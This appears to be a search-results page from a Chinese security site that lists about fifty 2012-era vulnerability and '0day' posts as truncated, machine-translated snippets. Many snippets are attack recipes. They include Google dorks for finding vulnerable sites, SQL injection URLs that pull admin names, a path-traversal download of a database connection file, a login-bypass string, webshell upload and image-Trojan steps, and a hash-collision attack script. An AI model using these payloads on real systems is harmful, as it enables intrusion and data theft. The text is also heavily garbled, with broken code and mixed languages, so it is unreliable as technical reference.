7620 matches found
EasyPage SQL Injection Vulnerability-vulnerability warning-the black bar safety net
Title : EasyPage SQL Injection Vulnerability Author : Red Security TEAM Date : 19/01/2012 Risk : High Vendor : http://karait.com/ Tested On : Windows Server 2 0 0 8 Microsoft-IIS/7.5 Dork : inurl:default. aspx? page=Document&app=Documents&docId= Contact : Info 4t RedSecurity d0t COM Home :...
Linux kernels >=2.6.39 local root exploit 0day-vulnerability warning-the black bar safety net
This is absolutely awesome, and 2.6.39 on top of the kernel all the presence of this vulnerability. Original source http://blog. zx2c4. com/7 4 9, The 利用 代码 可 在 这里 找到 http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html the. The use of the/proc/pid/mem write,/poc file system is a virtual fil...
ewebeditor version>=5. 5 tasteless 0day and fix-vulnerability warning-the black bar safety net
To 6. X also works for ASP. aspx. JSP. Are work. Use method: To access this address Editor/asp/upload. asp? action=save&type=image&style=popup&cusdir=a. asp Visit this address can establish an A. ASP folder...... Then use this html code to upload. form...
ptcms PT fiction thief PTNovelSteal any code written 0day-vulnerability warning-the black bar safety net
pt the novel system through the kill version. But the official is already out of the patch! (The fucking game! OK the following text to start:here is our own exchange platform, is part of our 90sec all members of the technical sharing platform! This sets the program user did not use the database,...
pGB 2.12 kommentar.php SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Title: pGB 2.12 SQL Injection Vulnerability Author: 3spi0n Software website: http://www.powie.de/ Test platform: BackTrack 5 - Win7 Ultimate Platform: Php $ The defect file: kommentar.php $ Test site: http://www.badguest.cn /kommentar. php? id=1 1 7' Dar bi Koridor Benimki, Kendimi Aradigim...
PhpBridges Blog System members.php SQL injection and fix-vulnerability warning-the black bar safety net
Title: PhpBridges Blog System SQL Injection Vulnerability Author: 3spi0n Program website: https://launchpad.net/phpbridges Test platform: BackTrack 5 - Win7 Ultimate Development language: Php $The defect file: members.php $ Test site: www.badguest.cn /members. php? id=2" SQL Injection Dar bi...
ShuzirenCMS v4. 0 background Get a Shell and fix-vulnerability warning-the black bar safety net
A simple look under the... Find Asp Php script permission to seal too tightly throughout the website, directory any one not to write Test environment/system: Digital Information Center content management system ShuzirenCMS v4. 0 / Windows Regardless of your social worker,dig yourself the...
MS11-0 9 2--Arbitary Memoray Write 2 NULL bytes!- Vulnerability warning-the black bar safety net
The day received a few e ZDI vulnerability announcement message, wherein a is MS11-0 9 2. Due to the recent File format vulnerability more interested in, so it PatchDiff2 than a little patch file. Than after 贼心 does not change the need to see that there is no ready-made POC. GOOGLE had a...
Million enterprise Internet site program through the kill oday and repair programme-vulnerability warning-the black bar safety net
1, vulnerability analysis Vulnerability exists page: newsdisp. asp Obviously the injection vulnerability is! Some stations do anti-Note You! (cookie injection can be done. Generally the table name: admin Field name: username password Some STATION Table for wqadmin field Ibid. There is a more awso...
Kingdee Apusic Web framework for the backend to get the site webshell and repair-vulnerability warning-the black bar safety net
Apusic Web Management Console Default background address: admin/login. jsp The default management account password: admin admin Use method: the background has to execute SQL statements, also have to load anything. Specific words have forgotten Find Upload, a loaded God horse, just look to...
Pass to kill IIS7. 0 deformity parsing 0day vulnerabilities-vulnerability warning-the black bar safety net
To merge a PHP word pictures of horses, the combined method: ① , DOS merge: copy 1.gif /b + 1. txt/a asp.gif ② , With edjpgcom, make picture and word Trojan of the merger, Pictures just to find one. 【Incidentally, with the way edjpgcom the use of method: open the edjpgcom. exe the folder, and the...
z-blog 1.8 wap pages cell phone search at the SQL injection vulnerability and fix-vulnerability warning-the black bar safety net
具体 页面 请 查看 http://bbs.rainbowsoft.org/thread-65778-1-1.html 2 0 1 2 年 1 月 9 日 to update the record Important update 1, repair cell phone search atSQL injectionvulnerabilities, to give us the security risks are very sorry. Please update the compressed package of the FUNCTION/csystemwap. asp file...
Wordpress plugin Count-per-day plurality of defect and repair-vulnerability warning-the black bar safety net
Title: Count-per-day Wordpress plugin Arbitrary file download and XSS Affected versions: 3.1.1 Author 6Scan http://6scan.com security team www.2cto.com Download address: http://wordpress.org/extend/plugins/count-per-day/ Official fix: This advisory is released after the vendor has responded and...
python hash collision attacks exploit-vulnerability warning-the black bar safety net
/usr/bin/python to attack hash collision in python code by [email protected] 2012-01-05 to save as atk.py python atk.py 4 0 0 0 0 . 42.530313015 0.087562084198 import time, sys MAX = 1 0 0 0 0 0 try: MAX = int sys. argv1 except: pass t0= time. time k= for i in rangeMAX: k i223 1-i = 0 print '.'...
WordPress Plug-In wp-autoyoutube blind defect and repair-vulnerability warning-the black bar safety net
Title: WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability Author: longrifle0x Software: Wordpress Download address:http://wordpress. org/extend/plugins/wp-autoyoutube/ Test tool: SQLMAP Overview Wordpress Plug-In wp-autoyoutube is found that the presence of blind issues File:...
Apache Struts remote command execution and arbitrary file overwrite vulnerabilities-vulnerability warning-the black bar safety net
Release Date: 2 0 1 2 year 0 1 month 0 8 day Affected Software and systems Apache Struts 2.3.1 and following versions Vulnerability description Apache Struts is a development of Java Web application open source Web application framework. Apache Struts in the realization of the presence of the...
Pragyan CMS v 3.0 remote file disclosure-vulnerability warning-the black bar safety net
Title: Pragyan CMS v 3.0 = Remote File Disclosure Author Or4nG. M4n Download address http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2 The location of the defect download.lib.php line 1 6 index.php line 2 3 4 $GET'fileget' Test http://www.xxx.com /Pragyan/?...
http TRACE cross-site attacks a vulnerability test with the defense fix-bug warning-the black bar safety net
From the bad wolf's blog Web Presence: http TRACE cross-site attack vulnerabilities. Scan results: http TRACE cross-site attacks His webserver supports the TRACE and/or TRACK methods. TRACE and TRACK is used to debugweb serverthe connection to the HTTP way. Support the way of a presence Server...
razorCMS 1.2 path traversal-vulnerability warning-the black bar safety net
Title: razorCMS 1.2 Path Traversal Author: chap0 Download address: http://www.razorcms.co.uk/archive/core/ Affected version: 1.2 Test platform: Ubuntu Patches: Upgrade to latest release 1.2.1 RazorCMS is vulnerable to Path Traversal, when logged in with a least privileged user account the user ca...
Wordpress plugin Pay With a Tweet <= 1.1 a plurality of defect and repair-vulnerability warning-the black bar safety net
Title: Wordpress Pay With Tweet plugin = 1.1 Multiple Vulnerabilities Author: Gianluca Brindisi gATbrindi. si @gbrindisi http://brindi.si/g/ Download address: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip Affect version: 1.1 1 Blind SQL Injection in shortcode: Short code parameter...
Priza CMS plurality of defect and repair-vulnerability warning-the black bar safety net
Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability Author: BHG Security Center www.badguest.cn Software address: http://www.priza.co.il/ Affected version: 0.0.2 Test platform: ubuntu 11.04 Found by: - Net. Edit0r Net. edit0r at att dot net - G3n3Rall Ant1s3cur1ty at yahoo dot com...
ShopNC 1.3 tasteless local includes-vulnerability warning-the black bar safety net
This thing in front there is axss http://www.badguest.cn/Article/201107/98039.html -------------------------------------------------------------------------------- GPC before everything is floating clouds. of. So tasteless. it. ./ control/adv.php class advControl / Display advertising / public...
EasyWebRealEstate blind defect and repair-vulnerability warning-the black bar safety net
Title: EasyWebRealEstate Blind SQL Injection Vulnerabilitiy Author: H4ckCity Security Team farbodmahini badguest. cnwww. badguest. cn WwW.H4ckCity.Org Software address: www.easywebrealestate.com Affects all version: All Version Testing platform: GNU/Linux Ubuntu - Windows Server - win7 Example...
Mediashaker blind defect and repair-vulnerability warning-the black bar safety net
Title: Mediashaker Blind SQL Injection Vulnerabilitiy Author: H4ckCity Security Team www.badguest.cnWwW.H4ckCity.Org Affect all versions Developer: http://www.mediashaker.com/ Testing platform: GNU/Linux Ubuntu - Windows Server - win7 Sample test http://www.badguest.cn /content. php? id=1 Blind S...
Wind noise CMS 0DAY exploits-exploits warning-the black bar safety net
Keywords: inurl:User/Regservice. asp The wind noise the registration page... Vulnerability page:/user/SetNextOptions. asp Use method: Constructor injection user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,adminname,3,4,5,6,7,8++from+FSMFAdmin “adminname”admin user na...
under windows ie_iepeers. dll after the release of the heavy interest with vulnerability-vulnerability warning-the black bar safety net
Vulnerability details please view: ms10018, the http://technet.microsoft.com/en-us/security/bulletin/MS10-018 The key, if metasploit was not this exploit, where you can download: http://www.rec-sec.com/index.php Here also posted about it: this ruby code is saved directly to the...
DEDECMS recent xss 0day pass to kill all versions-bug warning-the black bar safety net
Vulnerability cause: due to Editor filter is not strict, will cause the malicious script to run. Can getshell Currently only tested on 5. 3 to 5. 7 version. Other earlier everyone is free to play. Here to talk about the use of the method. Condition 2: The 1. Open registration 2. Open submission...
Akiva WebBoard 8. x SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Title: Akiva Webboard 8. x SQL Injection + Plaintext Passwords in Profiles. Author: Alexander Fuchs www.2cto.com Download address: http://www.akiva.com/default.asp?l=1&id=8 Affected versions: 8. x Test platform: Windows, Linux. It is possible to login as administrator with admin'-- as the usernam...
Xiaomi technology website vulnerability collection and repair programme-vulnerability warning-the black bar safety net
Brief description: easy via Google Search, I found more of the size of the problem. Detailed description: 1, The m chat the official forum of the secondary injection. http://www.discuz.net/thread-2354532-1-1.html Patch. 2, a cross-site scripting...
Woven dream CMS system - visitors unlimited brush the top step on the value-vulnerability warning-the black bar safety net
Brief description: only tested DEDECMS V5. 7 system,the previous version of the estimates is the same. In the official address to be a simple test,should be regarded as a small BUG,using this you can infinite brush an article of the top/tread value. Detailed description: although the front page d...
WHMCS (cart.php) local file disclosure flaws and fixes-vulnerability warning-the black bar safety net
Author: R-t33n Product: WHMCS Developer: http://whmcs.com/ Affected version: 4. x. x Defect type: Remote , webapps Test platform windows 2 0 0 3 , Linux , ubuntu. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ http://www.badguest.cn/ PATH /cart. php? a=wrong...
Empire(EmpireCMS)cms 6.6 the background to get shell-vulnerability warning-the black bar safety net
Previous 6. 5http://www.badguest.cn/Article/201011/78510.htmlsomeone hair of the method is that the background---system setup---the management data table---management system models---import new module,directly put the modified php shell was renamed the shell. php. mod uploaded, the new version us...
Talking about web application permissions problems-vulnerability warning-the black bar safety net
Before knowing about web permissions there might be a problem, but in reality the test encountered is relatively small, today met on record: a warrior please don't waste your valuable time A, longitudinal Stripping of the right to In General the site has many users, divided into different...
ThinkPHP development framework xss-vulnerability warning-the black bar safety net
Brief description: open source php development framework for default therexssvulnerabilities, leading to all use of the framework for the development of the system are presentxssvulnerability Detailed description: does not does not exist in the module handle the error properly, leading...
OpenEMR 4 multiple defects and repair-vulnerability warning-the black bar safety net
OpenEMR 4 Level @ Smash The Stack Summary: Patient Photograph Arbitrary File Upload Initial Comment: 1. Login with valid User/Pass 2. Patient/Client - Search/New Patient search for anything 3. Click Documents - Patient Photograph 4. Upload Shell URL:...
StarNet interactive upload vulnerability analysis-vulnerability warning-the black bar safety net
Author:like a dog man upfileflash. asp % set upload=new uploadfile if upload. form the"act"="uploadfile" then filepath=trimupload. form"filepath" filelx=trimupload. form"filelx" i=0 for each formName in upload. File set file=upload. FileformName fileExt=lcasefile. FileExt 'get the file extension...
shop363 online program really pass to kill the vulnerability 0day exploit-vulnerability warning-the black bar safety net
This app security is not very good, but one of the replace()function to write well, but did not find is how to write, and the injection of“space, select,%2 0, a+number, and//, etc. filter is empty. In searching out the loopholes in the statements a lot of trouble, I also do not write, directly to...
Plone zope remote command execution vulnerability(python)-bug warning-the black bar safety net
Versions Affected without hotfix: Plone 4.0 through 4.0.9; Plone 4.1; Plone 4.2 a1 and a2; Zope 2.12. x and Zope 2.13. x. Versions Not Affected: Versions of Plone that use Zope other than Zope 2.12. x and Zope 2.13. x. Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928...
Joomla component(com_dshop) SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Title: Joomla Component comdshop SQL Injection Vulnerability Author: CoBRa21 www.badguest.cn uykucu at windowslive.com Level: high risk SQL defects http://www.badguest.cn /PATH/index. php? option=comdshop&controller=fpage&task=flypage&idofitem=1 2 SQL Test example...
kingcms5. 0/5. 1 vulnerability-the vulnerability warning-the black bar safety net
To 1. kingcms 5.0 fckeditor the default path in the admin/system/editor/FCKeditor/editor/fckeditor.Html The local horse named for the hx. asp;jpg watch jpg the front there is no point.. OK..actually later do stations combined fckeditor this editor..plus the best verification..only management can...
Strong intelligent academic management system vulnerability-vulnerability warning-the black bar safety net
1: the login box does not filter the result can be directly injected into the 2: any download file vulnerability naked SA。。。。。 Use: http://www.xxx.com/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp. Keywords: strong intelligent University academic management system...
QCMS 1.6 minor bugs and fixes-vulnerability warning-the black bar safety net
Baidu and GG told me so few people with so release. The problem in the background login authentication private function adminlogin if! empty$REQUEST'api' || $REQUEST'api' == $this-psite'connect' || $COOKIE'api' == $this-psite'connect' setcookie "api", $this-psite'connect', time + 3 1 5 3 6 0 0 0,...
BIWEB bugs and fixes-vulnerability warning-the black bar safety net
BIWEB PHP open source enterprise built Station system bug fixed version, 1. Pass to kill the contains /wap/detail.php, X, X... $objWebInit = new wap; if empty$GET'page' $intPage = 1 ; else $intPage = intval$GET'page'; if empty$GET'cpage' $intCPage = 1 ; else $intCPage = intval$GET'cpage'; if !...
Apache Struts session tampering with the security restrictions bypass vulnerability-vulnerability warning-the black bar safety net
Release date: 2011-01-01 Update date: 2011-12-16 Affected system: The Apache Group Struts 2.1.8 .1 The Apache Group Struts 2.0.9 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 5 0 9 4 0 Apache Struts is a development of Java web...
mPDF <= 5.3 file disclosure and fix-vulnerability warning-the black bar safety net
Title: mPDF = 5.3 File Disclosure Author: ZadYree Download address: http://www.mpdf1.com/mpdf/download Affected versions: 5.3 and prior Test platform: multiple !/ usr/bin/perl-U =head1 TITLE mPDF = 5.3 File Disclosure Exploit 0day =head2 SYNOPSIS -- examples/showcode.php --...
Seotoaster SQL injection background login authentication to bypass the defect and repair-vulnerability warning-the black bar safety net
Seotoaster SQL-Injection Admin Login Bypass Author Stefan Schurtz www.badguest.cn [email protected] Affected Software: Successfully tested on Seotoaster v. 1. 9 Developer: http://www.seotoaster.com/ Problem status:repair Defect description ========================== Seotoaster v. 1. 9 containi...
Sina microblogging certified design flaws and fixes-vulnerability warning-the black bar safety net
Brief description: Sina Weibo design defects, resulting in know the original account password, even if the modified password can be obtained permission to publish Twitter, add attention like operation, 可以参考http://www.80sec.com/session-hijackin.html Describe: Sina microblogging authentication on t...
Capexweb universal password-vulnerability warning-the black bar safety net
Title: Capexweb Sql Vulnerable Author: D1rt3 Dud3 Affected version: 1.1 A description of the problem: Capexweb is a Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc. http://www.badguest.cn /capexweb/capexweb/ Log in details: Username:...
To solve the Fckeditor to remove all the upload page how to upload-vulnerability warning-the black bar safety net
First of all,you have to determine the next Fckeditor version. /FCKeditor/editor/dialog/fckabout.html Secondly,you determine under the following upload page is really deleted? /FCKeditor/editor/filemanager/browser/default/browser.html...
dedecms any address jump-vulnerability warning-the black bar safety net
Brief description: dedecms any address jump Detailed description: http://www.dedecms.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D $link = base64decodeurldecode$link; http://www.badguest.cn the link can be configured to any address, below to jump directly. header"location:$link...